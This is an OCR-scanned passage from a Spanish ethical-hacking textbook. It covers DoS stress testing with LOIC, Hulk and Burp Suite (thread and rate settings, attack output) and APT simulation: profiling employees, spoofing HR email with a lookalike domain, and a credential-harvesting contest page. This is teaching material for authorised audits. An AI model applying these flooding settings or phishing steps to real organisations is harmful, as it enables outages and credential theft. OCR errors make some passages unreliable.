direcciones  /P,  tipo  Whatsmyip.com  y  verificar  la  ubicacion  geografica  de  esta  direccion  con  algiin 
sei’vicio  de  Geo-IP. 

Elegir  la  region  adecuada  nos  puede  ser\'ir  para  estar  mas  cerca  del  objetivo,  para  estar  en  el  mismo 
CPD  que  el  objetivo  si  resulta  que  tambien  es  una  maquina  alojada  en  Microsoft  Azure  o  para 
conseguir  iin  ataque  coordinado  y  distribuido  usando  diferentes  ubicaciones  en  paralelo  que  nos 
permita  evaliiar  los  sistemas  dc  proteccion  que  estan  configurados  para  proteger  los  servidores  de 
los  objetivos. 
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Configuracion  de  la 

maquina  virtual 

SERViaO  EN  LA  NUBE 

j 

-  — t 

1  Crear  un  nuevo  sen.'icio  en  la  nube 

V 

MOMBRE  D.NS  DE  SERVICIO  EN  lA  NUBE 

TESTING0C2 

'  .Cioudapp.net 

SUSCRiPCION 

BizSpark  Plus  1TT1 

1 

REGION/GRUPO  OE  AFINIDAD/RED  VIRTUAL 

GA-RecIFAAST 

V 

! 

Grupos  de  afinidad _ 

"Ml 

Oeste  de  Europe 
Norte  de  Europe 
Este  de  EE  UU. 
Oeste  de  EE.  UU. 
Sudeste  de  Asia 
Este  de  Asia 


Fig.  3.80:  Seleccion  dc  region  en  .  Izu 


Una  vez  que  se  tiene  todo  preparado,  se  deben  realizar  pequenas  pruebas  contra  recursos  propios  con 
el  fin  de  verificar  que  la  arquitectura  y  el  potencial  se  encueutran  disponibles  para  atacar  y  conseguir 
el  objetivo.  Si  todo  va  bien,  habra  que  esperar  a  que  Ilegue  la  ventana  de  tiempo  para  ejecutar  las 
prtiebas  y  lograr  el  objetivo  de  dejar  a  la  empresa  sin  servicio. 


PoC:  Colapsando  las  conexiones 

En  esta  prueba  de  concepto  se  utilizan  diversas  heiTamientas  para  llevar  a  cabo  el  ataque.  Se  puede 
construir  una  estrategia  basada  en  tiempo  de  actuacion  o  por  inundacion  total.  En  este  ejemplo  se 
utilizaran  las  maquinas  creadas  y  configiiradas  cn  la  prueba  dc  concepto  anterior  para  colapsar  las 
conexiones  de  los  elementos  frontales  de  la  empresa.  La  heiTamienta  LOIC  permite  llevar  a  cabo 
una  inundacion  de  conexiones  TCP,  pero  no  sera  la  unica  herramienta  que  sc  utilice.  Se  dispone  de 
tin  script  denominado  Hulk  el  cual  permite  inundar  de  peticiones  HTTP  un  recurso  o  servidor  web. 
Tambien  se  dispone  de  la  lien'amienta  burp  suite  con  la  que  se  puede  realizar  tareas  similares  al 
script  anterior. 

El  objetivo  de  LOIC  es  el  protocolo  TCP,  mientras  que  Hulk  y  Burp  se  utilizaran  para  el  protocolo 
Http.  La  estrategia  es  impoitante,  se  puede  paitir  con  todo  el  potencial,  con  el  riesgo  de  podcr 
quedar  bloqueado  por  la  empresa  y  perder  las  maquinas,  o  ir  con  una  estrategia  dividida,  y  con 
ciertos  patrones  de  ataque  aleatorios,  buscando  precisamente  evitar  el  bloqueo,  pero  aumentado 
progresivamente  el  potencial  de  ataque.  La  estrategia  debe  ser  elegida  por  el  equipo  en  funcion  de 
las  caracteristicas. 


174 


Ethical  Hacking:  Teoriay  prdctica  para  la  real izac ion  de  iin  pentesting 


La  configuracion  de  las  herramientas  es  importajite,  ya  que  parte  de  la  eficiencia  de  los  ataques 
residira  en  este  hecho.  Para  esta  prueba  de  concepto  se  propone  la  sigiiienle  configuracion  para  la 
herramienta  burp  suite: 


Propiedad 

Valor 

Threads 

127 

Conexion 

/////?[s]://<recurso  web  al  que  realizar  peticiones> 

Plataforma 

Java 

Conexiones  por  segundo 

90  (Lo  que  se  puede  conseguir  por  maquina) 

Entendiendo  que  cada  inaquina  ejecuta  127  hilos,  y  que  cada  maquina  genera  90  conexiones  por 
segundo,  en  todas  las  niaquinas  se  oblendria  alrededor  de  90  x  60  =  5400  conexiones  por  segundo. 
El  equipo,  en  sus  pruebas,  deberia  haber  probado  estos  valores  para  tomar  la  decision  de  si  necesitan 
mayor  potencia  o  piiede  valer  para  congestionar  complclamente  el  objetivo.  Esto  siempre  dependera 
de  la  infraestructura  del  cliente.  A  conlinuacion  se  puede  visualizar  una  imagen  del  script  Hulk  en 
fiincionamiento.  Esta  herramienta  vuelca  su  query  en  peticiones  a  recursos,  lo  que  aiimentara  el 
poder  de  saluracion  en  la  prueba. 


»-  /cygdriue/c/hulk 

—  HULK  Attack  Started  — 

773  Requests  Sent 
876  Requests  Sent 
977  Requests  Sent 
1078  Requests  Sent 
1179  Requests  Sent 
1280  Requests  Sent 
1381  Requests  Sent 
1482  Requests  Sent 
1583  Requests  Sent 
1684  Requests  Sent 
1786  Requests  Sent 
1888  Requests  Sent 
1989  Requests  Sent 
Response  Code  500 
Response  Code  500 
Response  Code  500 _ _ 

Fig.  3.8 1 :  Hulk  cn  cji'cncifm. 


Por  ultimo  la  configuracion  de  LOIC  para  esta  prueba  de  concepto  podria  ser  algo  como  lo 
siguiente; 


Propiedad 

Valor 

Threads 

60 

Conexion 

<Direcci6n  IP  target> 

Plataforma 

.NET 

Conexiones  por  segundo 

60 

- - 
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Con  LOIC  existe  un  punto  en  el  que  a  mas  hilos  no  Iiay  mejores  resultados,  cs  la  capacidad  de  la 
inaquina  y  del  sistema  operativo  para  realizar  las  operacioncs.  Ese  valor  debe  ser  buscado  durante 
las  pruebas  comentadas  en  la  prueba  de  concepto  anterior.  En  esle  caso,  se  proponen  60  hilos  por 
maquina,  y  cada  maquina  es  capaz  de  generar  60  conexiones  por  segundo.  Estos  son  los  datos 
obtenidos  en  las  pruebas  con  el  cntorno  adquirido,  por  lo  que  60  x  60  maquinas,  3600  conexiones 
por  segundo. 

Siempre  habra  que  tener  en  cuenta  los  elementos  de  bloqueo  que  disponen,  o  debcrian  disponer  las 
empresas,  y  la  eficiencia  de  sus  elementos  de  seguridad  perimelrales  en  lo  quo  a  respuesta  se  refiere. 
Es  decir,  puede  que  se  esten  creando  conexiones  rapidamcnte,  y  que  los  elementos  de  seguridad  no 
esten  bloqueando  direcciones  IP  ni  cen*ando  lodas  las  conexiones  rapidamente,  por  lo  que  se  pueden 
ir  acumulando.  El  problema  de  la  dcnegacion  puede  tardar  minutos  en  aparecer,  o  incluso  horas. 
pcro  si  no  se  protegen  acaban  cayendo. 

Otra  estrategia  es  dividir  los  tiempos  de  la  ventana  temporal  para  llevar  a  cabo  pruebas  concretas 
para  poder  ver  como  van  reaccionando  los  distintos  protocolos,  elementos  y  capas.  Eso  si,  en  algun 
momento  se  tendra  que  lanzar  la  maxima  potencia  de  lo  que  se  ha  contratado  en  el  cloud  para 
intentar  Ibrzar  la  caida  del  serv'icio. 


Herramientas  utilizadas 

En  este  apaitado  se  muestran  herramientas  que  pueden  ser  utilizadas  en  el  proceso  de  una  prueba 
de  estres.  A1  final  es  el  equipo  de  auditores  el  que  elegira  las  herramientas  necesarias  para  llevar  a 
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cabo  estas  pmebas,  pero  se  deben  conocer  bien  y  saber  que  realiza  cada  herramienta  por  debajo  en 
todo  memento. 

A  las  ya  mencionadas  LOIC,  Hulk  o  Burp,  se  piieden  anadir  las  siguienles: 

-  JaniDos.  Hen*amienta  para  rtSLiizar  flooding  disponible  en  Internet. 

-  Pandora  DDoS.  Motor  con  varies  ataques  dQ  flooding  implementados.  Inundacion  por 
varies  metodos  de  HTTP  y  TCP. 

-  DNS  Reflection.  Este  codigo  escrito  en  lenguaje  C  peimite  implementar  un  ataque  de  DNS 
Amplification,  enviando  una  peticion  DNS  a  un  servidor  DNS  configLirado,  cambiando  la 
direccion  IP  origen  en  tieinpo  de  ejecucion.  Aunque  la  heiTamienta  esta  escrita  coino  pnieba 
de  concepto,  se  puede  entender  el  codigo  y  saber  como  se  puede  implementar  este  tipo  de 
tecnicas. 

-  Servicios  web,  como  las  que  ya  tiene  LOIC.  Esto  no  es  recomendable  en  una  auditoria,  ya 
que  se  salta  la  etica  y  la  confidencialidad  de  todo  el  proceso,  utilizando  servicio  no  controlados 
por  el  equipo  de  auditoria  directamente. 

Existen  diversas  heiTamientas  que  se  pueden  encontrar  en  Internet,  por  lo  que  se 
recomienda  investigar  y  probarlas  cn  entornos  controlados,  y  sobre  todo  verificar  el  tipo  de 
peticiones  que  realizan,  por  ejemplo  analizando  con  Wireshark. 


7.  APT 

Advanced  Persisiem  Threat  es  algo  complejo  de  calificar  a  priori,  y  aunque  en  algunos  pi  legos  y 
propuestas  de  procesos  de  Ethical  aparecen  con  este  nombre,  estas  pruebas  no  son  realinente 

un  APT  real,  aunque  se  puede  entender  como  una  simulacion.  Cualquier  organizacion  con  cualquier 
tipo  de  recursos  no  podria  llevar  a  cabo  un  APT.  Realrnente  es  algo  ccrcano  a  gobiemos  y  entidades 
con  muchos  recursos  y  dinero. 

<;;Simulaci6n?  Si,  es  una  especie  de  juego  donde  se  pretende  intentar  atacar  y  obtener  infonnacion 
sensible  de  un  conjunto  de  personas,  o  incluso  de  una  persona  en  concreto.  a  la  que  se  denomina 
muestra  y  que  pemiite  evaluar  la  posibilidad  de  que  estas  cayesen  en  un  ataque  real. 

En  un  proceso  de  Ethical  Hacking  esta  prueba  se  realiza  contra  los  empleados,  representados 
como  una  muestra  de  una  empresa.  Se  llevaran  a  cabo  distintas  pruebas  con  el  fin  de  determ inar  la 
concienciacion  de  los  empleados  contra  ataques  reales  y  dirigidos  contra  ellos.  Se  realizan  varias 
piaiebas,  en  las  que  se  pretende  calificar  y  verificar  el  comportamiento  de  los  empleados  ante  distintas 
situaciones  de  peligro. 

En  muchas  ocasiones  se  puede  caer  en  el  eiTor  de  que  es  un  simple  phishing,  y  esto  es  incoirecto, 
ya  que  una  simulacion  de  un  APT  lleva  asociado  una  preparacion,  estudio  y  conocimiento  de 
los  empleados  y  el  contexto  de  estos.  De  esta  forma  se  les  podra  poner  a  prueba  en  situaciones 
concretas,  previamente  estudiadas  y  preparadas  a  medida.  En  algunas  ocasiones,  los  auditores  se 
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pueden  convertir  en  guionisias  para  preparar  historias  que  puedan  enganar  a  los  empleados  al  fi.nl 
un  buen  gancho  e  ingenieria  social  pueden  ayudar  a  que  los  empleados  caiman  en  la  tramp  i  * 

Como  se  esludiara  en  este  apartado,  se  puede  paitir  desde  una  historia  navidena  con  nremioc 
la  preparacion  de  un  entorno  web  para  un  concurso,  la  obtencion  de  cuentas  de  correo  estudio  le 
viabilidad  en  el  envio  de  estos,  preparacion  de  apps  moviles  para  enganarles  a  traves  de  trovino^ 
etcetera.  Cada  vez  estas  tecnicas  son  mas  y  mas  complejas,  y  realrnente  el  limite  puede  estar  en  h 
imaginacidn  de  cada  uno. 


Historia  de  APT 

El  concepto  de  APTsa\\6  a  la  tama  en  el  mundo  de  la  seguridad  y  de  la  tecnologia  tras  la  publicacion 
por  parte  del  periodico  The  New  York  Times,  de  un  ataque  realizado  por  ChinI  en  concreto  por  una 
umdad  militar  a  la  que  se  conocia  como  APT-1,  contra  redes  de  diferentes  medios  mediante  spear 
phishing  y  malware  avanzado. 

Como  se  ha  mencionado  anieriormente.  tin  APTse  centra  en  las  personas  o  grupos  de  personas,  es 
una  amenaza  sofisticada  de  un  ciberataque.  Historicamente  los  cibercriminales  y  los  ciberataques 
estaban  enfocados  a  la  aleatoriedad,  es  decir,  no  se  centraban  en  nadie,  sino  que  lo  impoilante 
era  obtener  un  beneficio,  sin  impoitar  de  quien  viniera.  Un  APT  ataca  de  forma  concreta.  sobre 
una  persona  o  grupo  de  personas,  esta  orientado  al  objetivo  especifico.  Este  hecho  hace  que  scan 
ciberataques  totalmcnte  validos  para  una  ciberguetTa,  para  una  lucha  entre  paises,  con  muchos 
recursos  para  investigar  y  emplear  tiempo  en  realizarlos. 

^Pot  que  aparecen  1  Es  una  tecnica  para  Ilegar  a  la  infonnacion  que  realrnente  importa,  la  informacibn 
que  liene  un  valor.  Es  indiferente  el  objetivo,  podria  ir  desde  un  directive  de  una  gran  empresa  hasta 
tin  miembro  de  gobierno  de  un  pais,  lo  imponantc  es  el  valor  de  la  persona  y  la  infonnacion  qiic  esta 
posee.  Historicamente  no  han  sido  ataques  faciles.  y  se  puede  obsert'ar  como  en  cl  caso  del  APT- 
I  de  China,  la  complejidad  es  extrema,  aunque  teniendo  en  cuenta  que  se  llegan  a  realizai;  es  una 
via  leal  para  Ilegar  a  informacibn  muy  valiosa.  Tambien  hay  que  resaltar  que  alaunos  4PT no  son 

excesivamentc  complejos  o  utilizan  tecnicas  clasicas.  el  valor  reside  en  la  persistencia  v  secuimiento 
del  objetivo. 

fComo  se  puede  llevar  a  cabo?  Quiza  ir  a  por  el  CEO  de  una  empresa.  presidente  de  una  compaiiia.  o 
incluso  de  un  pais,  no  sea  algo  sencillo,  por  lo  que  se  busca  un  rango  inenor  pero  que  este  en  contacLo 
con  el,  o  incluso  en  la  misma  red,  y  sirva  de  pivole  para  lograr  accrcarse  al  objetivo  real.  El  crado 
e  complejidad  aumenta  con  el  paso  del  tieinpo  en  este  tipo  de  ataques,  y  en  algunas  ocasioiies  se 
debe  sincronizar  una  serie  compleja  de  acciones,  infecciones.  situaciones  que  abran  el  camino  hasta 
el  objetivo  final. 

A  mediados  del  afio  2013,  hubo  una  cainpana  de  ciberespionaje,  via  APT.  denominada  NeiTraveler. 
os  objetivos,  o  algunos  de  ellos,  eran  diplomaticos.  agendas  gubemamentales,  militates,  etcetera. 

(,  omo  llevaron  a  cabo  el  ataque?  Todo  comenzb  con  una  campana  de  spear  phishing  el  ciial 
explotaba  dos  vulnerabilidades  de  Microsoft.  Los  atacantes  utilizaban  una  herramienta  con  la  que 
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extraian  del  sistema  la  infonnacion  gracias  a  un  malware  que  tenia  un  keylogger.  De  este  modo 
robaron  documentos  de  tipo  ofimatico.  Ademas,  cambiaron  configuraciones  para  robar  disenos  de 
AutoCAD  o  Corel  Draw. 

En  el  ano  2003  bubo  una  serie  de  ataques  bajo  el  nombre  de  Titan  Rain.  Los  ataques  fueron 
considerados  de  origen  Chino,  aunque  es  algo  que  no  se  confirmo  oficialmente.  Estos  ataques 
estaban  relacionados  con  el  espionaje  subvencionado  por  el  gobiemo,  espionaje  industrial  y  otros 
tipos  de  espionaje.  En  aquella  epoca  toda  esta  situacion  era  algo  "de  peliciila*\  ya  que  era  una 
epoca  lejana  a  la  nueva  era  de  la  cibergueiTa  y  el  ciberespionaje.  En  el  ano  2005  SANS  comunico 
que  lo  mas  probable  es  que  los  ataques  fueran  el  resultado  de  militares  chinos  muy  preparados  en  el 
ambito  de  la  seguridad  infonnatica,  cuyo  objetivo  seria  la  recopilacion  de  infonnacion  de  sistemas 
estadounidenses.  Se  consiguio  aceeso  a  redes  estadounidenses,  incluyendo  a  la  NASA  entre  otros. 

Estados  Unidos  y  su  Camara  de  Comercio  fue  victima  de  un  ataque  APT.  Lo  mas  curioso  de  la 
noticia  fue  la  via  por  la  que  comenzo  todo  y  fue  un  termostato  que  se  enconlraba  en  un  edificio  del 
Capitolio.  El  tennostato  fonna  parte  de  lo  que  se  conoce  como  el  Internet  de  las  Cosas  o  Internet  of 
Things  (loT).  Un  grupo  de  invesligadores  descubrieron  que  el  dispositivo  se  comunicaba  con  una 
direccion  IP  que  procedia  de  China.  La  tendencia  hace  que  cada  vez  mas  disposilivos  se  encuentren 
interconectados  en  Internet,  y  esto  puede  suponer  una  via  para  las  nuevas  amenazas. 

En  otras  palabras,  si  hay  mas  disposilivos  conectados  a  Internet,  los  atacantes  tienen  mas 
oportiinidades  para  atacarlos. 

Por  ultimo  y  retomando  con  el  parrafo  con  el  que  se  comienza  este  apartado.  hay  que  hablar  de 
la  Linidad  militar  secreta  China  que  revoluciono  Internet,  el  ciberespionaje  y,  posiblemente,  la 
eiberguerra.  China  podria  estar  detras  del  robo  de  datos  a  varias  empresas,  segun  informo  en  sii 
dia  la  empresa  de  seguridad  Mandiani.  La  empresa  presento  un  infonne  en  el  que  se  revelaban  las 
operaciones  de  ciberespionaje  de  la  unidad  APT!. 

En  el  infonne  Mandiant  se  exponia  toda  la  estrategia  de  ciberespionaje  a  nivel  empresarial  dcAPTI 
y  como  esto  se  relacionaba  con  la  unidad  del  gobiemo  chino.  Una  de  las  observaciones  que  se  hacian 
en  el  informe  era  la  linea  temporal  de  actuacion  y  los  detalles  de  la  inlfaestructura  de  la  que  contaba 
APTf  con  mas  de  40  familias  de  malware  distintas. 

La  base  se  encontraba  en  Shangai y  la  unidad  del  ejercito  chino  era  la  61398.  La  unidad  robo  cientos 
de  terahytes  de  alrededor  de  141  compahias  de  industrias  de  Estados  Unidos,  Canada  y  Reino  Unido. 
^,Cuanto  tiempo  estuvo  operativa?  Como  minimo  7  ahos.  En  e.sta  infonnacion  robada  se  podria 
encontrar  entre  conversaciones  entre  empleados,  correos  elcctronicos,  detalles  cconomicos,  etcetera. 


Pruebas 

En  una  simulacion  de  APT,  las  pruebas  que  se  ejecuten  siempre  seran  guiadas  por  las  nuevas 
experiencias  o  tecnicas  que  puedan  lograr  un  objetivo.  Hay  que  recordar  que  la  concatenacion  de 
pruebas  exitosas  puede  provocar  el  exito  final  y  consecucion  del  objetivo. 
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Es  cierto  que  existe  un  conjunto  de  pruebas,  las  cuales  se  pueden  entender . 
simulaciones.  pero  que  el  lector  tenga  claro  que  siempre  se  pueden  nnnH 

proceso  tan  flexible  e  imaginativo  como  este.  ‘  "  nuevas  lecnicas  cn  un 

A  continuacion  se  exponen  las  pruebas  que  pueden  format  parte  de  este  tipo  de  simulacion- 

-  Estudio  de  la  gente  que  formara  la  muestra  sobre  la  que  se  reali7-,Hn  rJ  u  r 
impoitante  estudiar  redes  sociales,  tanto  profesionales  como  de  ocio  en  busca 

mas  Aptos  para  llevar  a  cabo  la  prueba.  Un  perfil  apto  puede  ser  desde  >Z 
con  la  Kcnologh  hasla  an  c..*o  directive  IponL.e  que  p'ada  st 

n4“r  '« «  «  “4 

-  Entorno  ficticio  cercano  al  mundo  real.  Como  se  ha  mencionado  hay  que  conocer  hs 
Vidas  de  los  empleados  que  confonnan  la  muestra,  por  ello,  es  muy  interesante  el  obtencr 
mfotmacion  del  ambito  de  la  empresa  y  poder  anunciarles  de  nianera  directa  o  indirccfi 
a  los  empleados  algo  relacionado  con  la  empresa.  Se  proponen  varios  ejemplos  como  es 
el  tipico  concLirso  entre  empleados  en  el  que  se  les  mue.stra  que  les  ha  tocado  al^o  linica 
presentacion  de  aplicacion  corporativa  que  deben  probar.  uso  de  infonnacion  pmonal  o 
laboral  en  benehcio  del  proce.so,  etcetera.  En  e.ste  punto  la  imaginacion  del  auditor  ayudara 
y  es  que  sc  deben  cuidar  todos  los  detalles. 

Herramientas  de  control  remoto  y  e.xphits.  Es  una  prueba  clasica,  pero  qrie  con  las  nuevas 
tecnologias  moviles  se  ha  movido  a  esta  nueva  era.  El  uso  masivo  de  documentos  ofimaticos 
y  c  ispositivos  moviles  hace  que  la  prueba  de  exploits,  por  ejempio  en  un  PDF,  y  la  prueba 
c  herramientas  corporativas  que  hace  mas  de  lo  que  deberia.  son  un  ejempio  claro  de  lo  que 
se  puede  conseguir.  Lo  diticil  puede  ser  quo  esto  Ilegue  a  la  persona  adccuada.  pero  para  ello 
esta  la  lase  previa  de  conocer  y  relacionarse  de  manera  indirecta,  conseguir  llegaral  objetivo. 

La  clasica  prueba  de  mail  spoofing  cobra  importancia  en  esta  simulacion.  ya  que  puede 
ser  la  I  ave  para  lograr  tomar  comunicacibn  con  las  personas  que  conforman  la  muestra 

■yites  de  esto,  .se  deberan  conocer  los  correos  eleetronicos  de  los  empleados.  lo  cual  puede 
llcgar  a  no  ser  trivial. 


PoC:  Estudio  del  conjunto  de  muestra  a  auditar 

Como  ocurre  en  el  caso  de  las  pruebas  de  cstres  o  de  denegacion  de  servicio  el  tiempo  de  prcparacion 

L  f  el  tiempo  de  ejecucion  de  las  propias  pruebas.  Una 

m  acion  de  e.ste  tipo  no  es  lanzar  un  phishing  y  ver  si  funeiona.  esta  prueba  requiere  conocer 

objetivor  hasta  el  grado  quo  mlerese,  y  encontrar  la  via  adccuada  para  lograr  los 

Las  redes  sociales  han  rebajado.  en  muchos  casos.  cl  grado  de  privacidad  de  las  personas, 
nrenp  auditor  una  via  para  conocer  el  entomo.  correos,  gustos,  publicaciones  o 

PieocLipaciones  de  una  persona.  Redes  sociales  como  Linkedin  proporcionan  al  auditor  un  entorno 
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donde  encoiitrar  empleados  de  la  propia  organizacion  que  se  audita,  y  poder  formar  los  correos 
electronicos. 

En  esta  prueba  de  concepto  y  las  que  vienen  despues,  se  escenifica  como  se  recoge  intorniacioii  de 
50  personas,  que  seran  el  conjunto  de  muestra.  Los  miembros  de  seguridad  de  la  empresa  contratante 
requieren  que  al  menos  un  20%  sean  puestos  direclivos,  y  que  se  realicen  pruebas  a  sus  dispositivos 
moviles. 

El  equipo  de  auditoria  utilizara  recursos  y  tiempo  de  las  jomadas  para  llevar  a  cabo  las  siguientes 
tareas: 

-  Busqueda  de  cual  es  el  formato  de  los  correos  electronicos  corporativos. 

-  Estudiar  y  evaluar  los  perfiles  de  las  personas  que  confonnaran  el  conjunto  de  muestra. 
^,Cuales  son  buenas  ideas  para  formar  un  conjunto  de  muestra?  Principalmente  el 
desconocimiento  tecnologico  y  la  no  concienciacion.  Esto  no  es  facil  de  saber  a  priori, 
por  ello  puede  ser  interesante  conocer  algo  mas  de  las  personas  y  no  solamente  su  con'eo 
electronico.  Conseguir  un  conjunto  de  muestra  optimo  para  lograr  el  mayor  exito  en  el  APT 
es  una  tarea  critica  y  sumamente  impoitante. 

Seleccion  final  de  los  peifiles  y  perfilar  sus  datos  en  documentacion.  Preparar  datos 
como  nombres.  correos  electronicos,  redes  sociales,  gustos,  sitios  que  frecuenta  en  Tntemet, 
etcetera. 

-  Analizar  con  toda  la  informacion  requerida  cual  es  la  via  adecuada  para  realizar  la 
simulacion  de  APT. 

Es  importante  analizar  el  entorno  de  la  empresa.  eventos  que  esta  realice,  epoca  del  ano,  por 
si  se  puede  presentar  algo  que  la  empresa  festeje  anualmente,  etcetera. 


El  plan  estrategico  es  muy  importante,  se  debe  tener  claro  cual  sera  la  operativa  y  como  llevarla  a 
cabo,  por  lo  que  se  empleara  tiempo  en  el  guion  que  se  realizara. 

Tras  la  recogida,  evaluacion  y  sintesis  de  infonnacion  refcrente  a  los  empleados,  se  llega  a  la 
conclusion  de  que  la  mejor  via  es  crear  un  evento  debido  a  la  epoca  del  ano  en  la  que  se  encuenlran, 
el  cual  la  empresa  lleva  dos  anos  realizando.  Parece  ser  que  deben  estar  a  punto  de  realizar  el  evento 
este  ano  de  manera  similar,  por  ello  el  equipo  de  auditoria  escoge  presentar  un  evento  ficticio  al 
conjunto  de  muestra  con  el  fin  de  ser  lo  mas  parecido  a  la  realidad  posible. 

El  evento  simulara  un  concurso  en  el  que  los  empleados  pueden  participar  y  deberan  votar  por  la 
mejor  fotografia  de  las  vacaciones  en  las  que  ellos  ban  estado.  Se  explica,  como  hacia  la  empresa 
en  anos  anteriores,  que  el  ganador  obtendra  un  iPad  de  Apple,  y  que  ademas  se  donara  una  cantidad 
de  dinero  a  una  ONG. 

De  manera  clara  el  equipo  de  auditores  se  esta  aprovechando  de  las  buenas  acciones  de  la  empresa 
en  anos  anteriores  y  que  el  escenario  puede  ser  realmente  creible.  El  guion  comienza  a  prepararse, 
y  el  siguiente  paso  es  preparar  la  plataforma  donde  se  alojara  el  evento  y  el  como  se  realizara  la 
operativa  final. 


Capita  lo  III  Confeccionando  el  atacjne 


Tambien  hay  que  estudiar  como  llegara  la  noticia  y  el  acceso  al  evento  a  las  victimas  En  este  caso 
la  via  elegida  es  el  correo  electronico  corporative,  por  lo  que  hay  que  trabajar  la  viabilidad  para  que 
los  correos  spoqfeados  lleguen  a  su  destine,  y  que  este  sea  a  la  bandeja  de  entrada  de  los  usuarios 


PoC:  Preparacion  y  configuracion  de  pruebas 

Con  el  guion  preparado  y  el  conjunto  de  muestra  escogido  se  debe  estudiar  la  viabilidad  para  que 
los  correos  electronicos  con  la  invitacion  al  concurso  lleguen  a  sus  destinatarios.  Los  auditores  se 
pueden  encontrar  con  varios  problemas  y  son  los  mecanismos  de  proteccion  de  los  servidores  de 
correo  de  la  empresa  victima.  El  equipo  realiza,  junto  al  grupo  de  seguridad  de  la  empresa,  una 
prueba  para  ver  si  los  correos  falsos  que  preparan  llegan  a  la  bandeja  de  entrada. 

Una  de  las  primeras  cosas  que  se  deben  tener  en  cuenta  es  la  suplantacion  del  dominio.  En  teoria, 
el  correo  de  invitacion  al  concurso  se  debe  realizar  desde  una  cuenta  de  la  organizacion.  lo  cual 
puede  ser  sumamente  complicado,  ya  que  se  deberia  robar  la  credencial  de  alguna  cuenta  interna.  La 
solucion  que  el  equipo  encuentra  es  utilizar  un  servidor  de  correo  propio,  ya  sea  montado  por  ellos 
como  puede  sendmail  o  utilizar  alguno  online  como  emkei.cz. 

Si  se  envia  el  correo  electronico  suplantando  el  dominio,  seguramente  el  servidor  de  coitco 
lo  detectara  como  una  suplantacion  y  no  lo  dejara  pasar,  aunque  siempre  hay  que  probar  ya  que 
puede  habei  sorpresas.  Una  via  para  suplantar  el  dominio  y  que  el  dominio  parezea  el  original  es  la 
siguiente: 

-  Si  el  nombre  de  la  empresa  es  ImanesVentura  y  un  correo  valido  es  rrhh@imanesventura. 
com.  se  puede  entenderque  si  se  tililiza  la  siguiente  direccion  suplantada  iThh@lmanesvenlura. 
com,  la  primera  letra  se  puede  entender  como  una  1  mayuscula.  Depende  niticho  del  lipo  de 
letra  utilizado  para  representar  los  nombres.  pero  existen  letras  en  las  que  una  mayuscula  y 
una  miniiscula  de  otra  letra  tienen  un  parecido  enorme  en  su  repre.sentacion.  Es  c.sto  lo  que 
puede  valer  para  que  el  coireo  llegue,  y  que  la  direccion  sea  creible. 

-  Se  debe  escoger  el  nombre  de  usuario,  en  este  caso  puede  ser  interesante  saber  quien 
oiganizaba  ese  evento  que  se  esta  suplantando.  Se  supone  que  lo  hacia  recursos  humanos,  y 
por  ello  la  cuenta  desde  la  que  se  envia  es  una  copia  de  la  de  recursos  humanos  dc  la  empresa. 

En  muchas  ocasiones  el  coireo  puede  no  llegar  porque  se  utilizan  links,  los  cuales  el  senudor  de 
con-eo  califica  de  peligrosos,  y  o  llega  a  la  carpeta  de  SPAM,  o  directamente  no  llegan.  Esto  tambien 
hay  que  analizarlo  y  verificar  que  en  el  correo  final  que  se  prepara  todo  este  perfecto  para  que  llegue 
a  la  bandeja  de  entrada.  Otro  contratiempo  puede  ser  la  direccion  IP  elegida  para  enviar  el  correo, 
puede  que  pertenezea  a  alguna  lista  negra  y  que  no  se  deje  pasar  dicho  con'eo. 

El  correo  debe  tener  hasta  el  minimo  detalle  de  un  correo  electronico  original  de  la  compania,  desde 
logos  que  pueden  ser  cargados  desde  una  direccion  URL  de  la  propia  compania,  pies  de  coneo  con 
las  advertencias  legales,  finnas  de  personas  o  departamentos,  etcetera.  Todo  detalle  es  poco  para 
conseguir  que  la  victima  acepte  el  correo  como  valido,  y  que  el  servidor  entienda  que  el  contenido 
no  es  malicioso.  Por  ultimo,  y  tras  el  mensaje  de  invitacion  al  concurso  se  debe  colocar  una  imagen. 
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o  link,  que  redirija  hacia  el  sitio  web  ficticio.  Esta  es  la  parte  cn'tica,  ya  que  segun  coino  se  realice 
el  servidor  de  correo  de  la  organizacion  decidira  si  es  Apto  o  no.  la  direccion  URLl  Tambien  se 
debe  ocultar  a  la  vista  del  iisuario,  por  ello  se  pueden  utilizar  servicios  de  acortadores  como  bit.ly, 
tinyiirl,  etcetera. 

Una  vez  que  se  comprueba  que  los  cori'eos  electronicos  began  a  la  bandeja  de  entrada  de  los 
miembros  de  seguridad  de  la  einpresa,  se  puede  hacer  un  check  sobre  este  pequeno  requisite  previo 
a  lanzar  el  ataque.  El  phishing  al  que  llevara  el  coiTeo  electronico  tambien  debe  ser  preparado  con  el 
maximo  detalle,  tal  y  como  se  prepara  el  correo. 

En  el  servidor  web  se  comprueba  si  la  victima  accede  con  un  dispositive  movil  o  no,  para  mostrar 
una  infomiacion  u  otra.  Esto  demuestra  que  se  ha  tenido  en  cuenta  la  posibilidad  de  que  las  victimas 
accedan  a  traves  de  los  dispositivos  moviles.  Mas  adelante  se  podra  entender  que  con  esto  se 
abre  una  nueva  ventana  o  via  de  ataque  a  los  propios  dispositivos  moviles.  ^-.Para  que?  Se  podria 
intentar  instalar  una  APK  en  Android,  simulando  ser  herramienta  coiporativa,  o  instalar  un  perfil  de 
dispositive  en  iOS  con  fines  maliciosos. 

I^Qug  se  muestra  en  la  web?  Debe  haber  un  mensaje  claro  que  indique  las  bases  y  el  objetivo  del 
concurso.  Todo  debe  ser  claro  y  orientado  a  que  el  usuario  inlroduzca  las  credenciales  de  empleado 
para  poder  partieipar  en  el  concurso.  Ademas,  se  les  puede  dejar  que  carguen  la  imagen  con  la  que 
quieren  partieipar,  para  hacerlo  aun  mas  realista.  El  minimo  detalle  juega  un  papel  importanlc  y  en 
algunos  casos  se  ban  puesto  candados  e  informando  de  zonas  seguras,  con  imagenes  utilizadas  por 
la  propia  empresa. 


Usuarioi 

Contrasena: 


J 


Fig.  3.H3:  Minimo  delalle  en  el  siliu  web  para  preiporcionar  eonllan/a. 


Al  final  la  operativa  es  la  siguiente: 

El  empleado  recibe  un  correo  electronico  en  su  bandeja  de  entrada  informandole  de  que  el 
deparlamento  de  RRHH  de  la  empresa  ha  vuelto  a  organizar  un  concurso  para  sus  emplcados. 
Se  indica  que  el  premio  es  un  iPad y  que  se  valorara  la  mejor  fotografia  de  las  vacaciones  dc 
sus  empleados.  Ademas,  habra  una  suma  economica  que  ira  destinada  a  una  ONG.  Cuando 
el  empleado  inira  desde  que  correo  se  envia,  podria  no  deleclar  a  simple  vista  nada  extraho, 
